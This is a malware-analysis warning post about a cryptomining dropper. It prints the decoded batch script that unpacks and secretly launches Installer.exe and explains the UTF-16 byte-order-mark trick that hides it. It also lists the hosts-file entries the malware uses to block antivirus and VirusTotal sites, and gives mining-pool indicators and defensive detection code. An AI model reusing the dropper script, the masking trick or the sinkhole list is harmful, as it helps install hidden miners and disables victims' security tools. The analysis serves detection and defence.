- xD
- DO NOT DOWNLOAD THIS: IT IS MALWARE.
- Evidence:
- %temp%\main\main.bat as a text editor displays it. This is not encryption: the file is plain ASCII batch, and the editor decodes it as UTF-16LE, so every two ASCII bytes become one CJK-looking glyph (挦 = "&c", 獬 = "ls", 敀 = "@e", 档 = "ch"). That is what an editor does with an ASCII file that carries a leading FF FE byte-order mark, a common batch-obfuscation trick; cmd.exe ignores the BOM and tries to run the two stray bytes as a command, which is most likely why the script starts with "&cls" (the junk command fails, then cls wipes the error from the console). Byte pairs whose second byte is a space land in the U+20xx range, where the code points are invisible or unassigned, so fragments such as the "o " of "echo off" are missing from the glyph string:
- 挦獬敀档景൦洊摯㔶ㄬര琊瑩敬朠朳㐳㍧朴㐳㑧″㌨朴㐳㑧栵栶㕪樶㘵⥪摭攠瑸慲瑣摥敲楦敬戮湩映汩楺൰挊污稷攮數攠映汩楺⁰瀭㘲㠴ㄹ㈴㈰㐶㌹㈰㜷㔵㈴㜲㐸ⴠ敯瑸慲瑣摥ഠ昊牯⼠┥湩⠠ⰴㄭㄬ 潤⠠慣汬㜠硥硥牴捡整⽤楦敬╟椥種灩ⴠ敯瑸慲瑣摥ഩ爊湥映汩楺⁰楦敬戮湩摣攠瑸慲瑣摥潭敶∠湉瑳污敬硥≥⸠⼮摣⸮摲⼠焯攠瑸慲瑣摥瑡牴扩⬠⁈䤢獮慴汬牥攮數ഢ猊慴瑲∠•䤢獮慴汬牥攮數ഢ挊獬捥潨䰠畡据敨䤧獮慴汬牥攮數⸧慰獵搊汥⼠焯∠湉瑳污敬硥≥
- The same bytes read as ASCII, i.e. the real contents of main.bat (the glyphs show the first line is "&cls" and the mode line is "mode 65,10"):
- &cls
- @echo off
- mode 65,10
- title g3g34g34g34g43 (34g34g45h6hj56j56j)
- md extracted
- ren file.bin file.zip
- call 7z.exe e file.zip -p26489142026493027755422784 -oextracted
- for /l %%i in (4 -1 1) do (
- call 7z.exe e extracted/file_%%i.zip -oextracted
- )
- ren file.zip file.bin
- cd extracted
- move "Installer.exe" ../
- cd..
- rd /s /q extracted
- attrib +H "Installer.exe"
- start "" "Installer.exe"
- cls
- echo Launched 'Installer.exe'.
- pause
- del /f /q "Installer.exe"
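- Added example (my code, not the paste's or the malware's): reproduce the UTF-16 masking above, invert it, and flag files that use it. SAMPLE_SCRIPT is constructed from the first lines of main.bat, PAGE_GLYPHS are the first four glyphs of the listing above, and the reading of "&cls" as a cover for the BOM bytes is an assumption, not something the paste states.

```python
# Added example, not part of the paste: unmask a batch file that an editor
# shows as CJK text because it decodes the file as UTF-16, and flag the trick.
# SAMPLE_SCRIPT is constructed from the first lines of the dropped main.bat;
# PAGE_GLYPHS are the first four characters of the paste's "encrypted" listing.

BOM_UTF16LE = b"\xff\xfe"

# Constructed sample (50 bytes, an even count, so the UTF-16 view has no dangling byte).
SAMPLE_SCRIPT = "&cls\r\n@echo off\r\nmode 65,10\r\nmd extracted\r\npause\r\n"

PAGE_GLYPHS = "\u6326\u736c\u6540\u6863"  # 挦獬敀档, first four glyphs on the page


def build_masked_batch(script: str) -> bytes:
    """Prepend a UTF-16LE byte-order mark to plain ASCII batch source.

    cmd.exe ignores the BOM and treats its two bytes as the start of the first
    command line; the '&cls' that follows runs after that junk command fails
    and clears its error message (assumed to be why main.bat begins with '&cls').
    """
    return BOM_UTF16LE + script.encode("ascii")


def editor_view(raw: bytes) -> str:
    """What a BOM-honouring editor displays: one code unit per two ASCII bytes."""
    return raw.decode("utf-16")  # consumes the BOM, pairs the remaining bytes


def unmask(view: str) -> str:
    """Invert editor_view: re-encode the glyphs as UTF-16LE and read the bytes as text."""
    return view.encode("utf-16-le").decode("latin-1")


def is_bom_masked_batch(raw: bytes) -> bool:
    """Heuristic detector: a UTF-16 BOM followed by a body of pure printable ASCII.

    Genuine UTF-16 text carries a 0x00 high byte for every ASCII character, so
    a body with no 0x00 at all is ASCII wearing a UTF-16 BOM.
    """
    if len(raw) < 4 or not raw.startswith(BOM_UTF16LE):
        return False
    printable = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
    return all(b in printable for b in raw[2:])


if __name__ == "__main__":
    masked = build_masked_batch(SAMPLE_SCRIPT)
    print(editor_view(masked))                        # CJK glyphs, as on the page
    print(unmask(editor_view(masked)) == SAMPLE_SCRIPT)
    print(repr(unmask(PAGE_GLYPHS)))                  # '&cls@ech'
    print(is_bom_masked_batch(masked))
```

Running unmask over the whole glyph string from the page recovers the script minus the space-containing pairs that were dropped in transit, so for a real sample always work from the raw bytes on disk (strip the first two bytes) rather than from an editor's rendering.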
- file.zip password: 26489142026493027755422784 (passed to the first 7z call only; the loop extracts the inner archives without a password)
- file.zip tree (Windows tree /f output, each file_N folder holding the contents of file_N.zip):
- C:.
- │   file_4.zip
- │
- └───file_4
-     │   AntiAV.data
-     │   file_3.zip
-     │
-     └───file_3
-         │   file_2.zip
-         │
-         └───file_2
-             │   file_1.zip
-             │
-             └───file_1
-                     Installer.exe
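- Added example (my code, not the paste's): peel the nested zip chain that main.bat unpacks, but without running anything, hashing each leaf and bounding depth and member size. The nested archive is constructed in memory with an inert stand-in for Installer.exe and a placeholder AntiAV.data; it is not password-protected because the standard library cannot write encrypted zips, so the `pwd` argument is only exercised on a real sample.

```python
# Added example, not part of the paste: peel the nested zip chain the way
# main.bat does (file.zip -> file_4.zip -> ... -> file_1.zip -> Installer.exe),
# but on the analyst's side: nothing is executed, each leaf is hashed, and depth
# and member size are bounded so a hostile archive cannot exhaust the sandbox.
# The sample archive is constructed in memory with an inert stand-in payload.
import hashlib
import io
import zipfile
from typing import List, Optional, Tuple

MAX_DEPTH = 8                        # main.bat peels 5 layers; allow a little slack
MAX_MEMBER_BYTES = 64 * 1024 * 1024  # refuse single members larger than this

PAYLOAD = b"MZ constructed stand-in for Installer.exe, not an executable"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _zip(members: dict) -> bytes:
    """Build an in-memory zip from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_nested_sample() -> bytes:
    """Constructed stand-in for file.zip with the layout shown in the tree:
    file_1.zip holds Installer.exe, file_2.zip holds file_1.zip, file_3.zip holds
    file_2.zip, file_4.zip holds file_3.zip plus AntiAV.data, file.zip holds file_4.zip.
    Unencrypted: the stdlib cannot write password-protected zips."""
    archive = _zip({"Installer.exe": PAYLOAD})                  # file_1.zip
    for n in range(2, 5):                                        # file_2 .. file_4
        members = {f"file_{n - 1}.zip": archive}
        if n == 4:
            members["AntiAV.data"] = b"constructed placeholder\r\n"
        archive = _zip(members)
    return _zip({"file_4.zip": archive})                         # file.zip


def peel(blob: bytes, pwd: Optional[bytes] = None, depth: int = 0) -> List[Tuple[str, str, int]]:
    """Open every zip layer in memory and return (path, sha256, size) for each leaf.

    pwd is applied to the outermost layer only, matching main.bat, which passes
    -p to the first 7z call and none to the loop. zipfile reads ZipCrypto; a zip
    that 7-Zip encrypted with AES (-mem=AES256) needs a third-party reader.
    """
    if depth > MAX_DEPTH:
        raise ValueError("archive nesting deeper than MAX_DEPTH")
    leaves = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_MEMBER_BYTES:   # declared size; real size checked below
                raise ValueError(f"{info.filename}: declared {info.file_size} bytes exceeds limit")
            data = zf.read(info, pwd=pwd if depth == 0 else None)
            if len(data) > MAX_MEMBER_BYTES:
                raise ValueError(f"{info.filename}: inflated beyond limit")
            if zipfile.is_zipfile(io.BytesIO(data)):
                for path, digest, size in peel(data, None, depth + 1):
                    leaves.append((f"{info.filename}/{path}", digest, size))
            else:
                leaves.append((info.filename, sha256_hex(data), len(data)))
    return leaves


if __name__ == "__main__":
    for path, digest, size in peel(build_nested_sample()):
        print(f"{digest}  {size:>8}  {path}")
```

On the real sample call `peel(open("file.bin", "rb").read(), pwd=b"26489142026493027755422784")`; if zipfile raises NotImplementedError the outer layer is AES-encrypted and needs a reader such as 7-Zip itself or a third-party module.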
- Installer.exe hosts file changes (C:\Windows\System32\drivers\etc\hosts). Every line below maps a security-vendor or related domain to 0.0.0.0, so the victim can no longer reach AV download and update sites or VirusTotal from a browser:
- 0.0.0.0 avast.com
- 0.0.0.0 www.avast.com
- 0.0.0.0 totalav.com
- 0.0.0.0 www.totalav.com
- 0.0.0.0 scanguard.com
- 0.0.0.0 www.scanguard.com
- 0.0.0.0 totaladblock.com
- 0.0.0.0 www.totaladblock.com
- 0.0.0.0 pcprotect.com
- 0.0.0.0 www.pcprotect.com
- 0.0.0.0 mcafee.com
- 0.0.0.0 www.mcafee.com
- 0.0.0.0 bitdefender.com
- 0.0.0.0 www.bitdefender.com
- 0.0.0.0 us.norton.com
- 0.0.0.0 www.us.norton.com
- 0.0.0.0 avg.com
- 0.0.0.0 www.avg.com
- 0.0.0.0 malwarebytes.com
- 0.0.0.0 www.malwarebytes.com
- 0.0.0.0 pandasecurity.com
- 0.0.0.0 www.pandasecurity.com
- 0.0.0.0 surfshark.com
- 0.0.0.0 www.surfshark.com
- 0.0.0.0 avira.com
- 0.0.0.0 www.avira.com
- 0.0.0.0 norton.com
- 0.0.0.0 www.norton.com
- 0.0.0.0 eset.com
- 0.0.0.0 www.eset.com
- 0.0.0.0 zillya.com
- 0.0.0.0 www.zillya.com
- 0.0.0.0 kaspersky.com
- 0.0.0.0 www.kaspersky.com
- 0.0.0.0 usa.kaspersky.com
- 0.0.0.0 www.usa.kaspersky.com
- 0.0.0.0 dpbolvw.net
- 0.0.0.0 www.dpbolvw.net
- 0.0.0.0 sophos.com
- 0.0.0.0 www.sophos.com
- 0.0.0.0 home.sophos.com
- 0.0.0.0 www.home.sophos.com
- 0.0.0.0 www.adaware.com
- 0.0.0.0 adaware.com
- 0.0.0.0 www.ahnlab.com
- 0.0.0.0 ahnlab.com
- 0.0.0.0 www.bullguard.com
- 0.0.0.0 bullguard.com
- 0.0.0.0 clamav.net
- 0.0.0.0 www.clamav.net
- 0.0.0.0 www.drweb.com
- 0.0.0.0 drweb.com
- 0.0.0.0 emsisoft.com
- 0.0.0.0 www.emsisoft.com
- 0.0.0.0 www.f-secure.com
- 0.0.0.0 f-secure.com
- 0.0.0.0 www.zonealarm.com
- 0.0.0.0 zonealarm.com
- 0.0.0.0 www.trendmicro.com
- 0.0.0.0 trendmicro.com
- 0.0.0.0 www.ccleaner.com
- 0.0.0.0 ccleaner.com
- 0.0.0.0 www.virustotal.com
- 0.0.0.0 virustotal.com
- Installer.exe on VirusTotal: 52/70 engines flag it.
- Internet connections:
- 167.235.223.40:1123 | de.zephyr.herominers.com (a public Zephyr (ZEPH) mining pool, https://zephyr.herominers.com/; the pool is an ordinary service, the indicator is that the payload connects to it, which identifies Installer.exe as a cryptominer)
- Reverse (PTR) lookups seen, with the address each name encodes (octets reversed). The page does not tie the first three to the sample; check which process issued them before treating them as indicators:
- 28.118.140.52.in-addr.arpa (52.140.118.28)
- 240.221.184.93.in-addr.arpa (93.184.221.240)
- 217.106.137.52.in-addr.arpa (52.137.106.217)
- DNS request:
- de.zephyr.herominers.com
- DNS response:
- 167.235.223.40
- 40.223.235.167.in-addr.arpa (PTR lookup of the pool address 167.235.223.40)
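- Added example (my code, not the paste's) covering both the hosts-file list and the DNS observations above: a sweep that flags hosts entries sinking a watched vendor domain to 0.0.0.0 or 127.0.0.1, and DNS records that name the pool, including PTR names flipped back to an address. HOSTS_SAMPLE and DNS_LOG are constructed from the page's listings in an invented "<qtype> <name>" log format; WATCHED_DOMAINS is a subset of the page's list; the hosts path is the standard Windows one.

```python
# Added example, not part of the paste: sweep a host for the two network-side
# traces this sample leaves. (1) hosts-file lines that sink security-vendor
# domains to 0.0.0.0 or 127.0.0.1. (2) DNS activity naming the mining pool,
# including reverse (PTR) lookups, which appear as in-addr.arpa names and must
# be flipped back to an address before they can be matched. HOSTS_SAMPLE and
# DNS_LOG are constructed from the page's listings; the log format is invented.
import ipaddress
import re
from typing import List, Optional, Tuple

HOSTS_PATH = r"C:\Windows\System32\drivers\etc\hosts"   # standard Windows location

# Subset of the vendor domains Installer.exe sinks; subdomains match too.
WATCHED_DOMAINS = {
    "avast.com", "avg.com", "avira.com", "bitdefender.com", "eset.com",
    "kaspersky.com", "malwarebytes.com", "mcafee.com", "norton.com",
    "sophos.com", "trendmicro.com", "virustotal.com",
}
SINK_ADDRS = {"0.0.0.0", "127.0.0.1", "::1", "::"}

POOL_HOST = "de.zephyr.herominers.com"   # from the paste's connection list
POOL_IP = "167.235.223.40"

HOSTS_SAMPLE = """\
# constructed sample hosts file
127.0.0.1       localhost
192.168.1.10    fileserver.corp.local
0.0.0.0 avast.com
0.0.0.0 www.avast.com
0.0.0.0 us.norton.com   # trailing comment
0.0.0.0 virustotal.com
0.0.0.0 www.virustotal.com
"""

DNS_LOG = [                     # constructed: "<qtype> <name>"
    "A    de.zephyr.herominers.com",
    "PTR  28.118.140.52.in-addr.arpa",
    "PTR  240.221.184.93.in-addr.arpa",
    "PTR  40.223.235.167.in-addr.arpa",
    "A    www.example.com",
]


def parse_hosts(text: str):
    """Yield (address, hostname) for every mapping, ignoring comments and blank lines."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        fields = line.split()
        for name in fields[1:]:
            yield fields[0], name.lower()


def sinkholed_vendor_entries(text: str) -> List[Tuple[str, str]]:
    """Hosts entries that point a watched domain (or a subdomain of it) at a sink address."""
    hits = []
    for addr, name in parse_hosts(text):
        if addr in SINK_ADDRS and any(name == d or name.endswith("." + d) for d in WATCHED_DOMAINS):
            hits.append((addr, name))
    return hits


def scan_local_hosts(path: str = HOSTS_PATH) -> List[Tuple[str, str]]:
    """Run the check against the machine's real hosts file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return sinkholed_vendor_entries(fh.read())


def ptr_to_ip(name: str) -> Optional[str]:
    """'40.223.235.167.in-addr.arpa' -> '167.235.223.40'; None if not a valid IPv4 PTR name."""
    m = re.fullmatch(r"(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.in-addr\.arpa\.?", name.strip().lower())
    if not m:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(m.groups()))))
    except ValueError:
        return None


def dns_matches(lines: List[str]) -> List[Tuple[str, str]]:
    """Log lines that query the pool hostname or reverse-resolve the pool address."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 2:
            continue
        qtype, name = fields[0].upper(), fields[-1].rstrip(".").lower()
        if name == POOL_HOST:
            hits.append((line, "query for pool hostname"))
        elif qtype == "PTR" and ptr_to_ip(name) == POOL_IP:
            hits.append((line, f"reverse lookup of pool address {POOL_IP}"))
    return hits


if __name__ == "__main__":
    print(sinkholed_vendor_entries(HOSTS_SAMPLE))
    print(dns_matches(DNS_LOG))
```

The suffix match is deliberate: the sample also sinks names such as us.norton.com and home.sophos.com, which a plain equality check on the apex domain would miss. A hosts file that sinks localhost or an internal name is not flagged, so the check stays quiet on ordinary administrative edits.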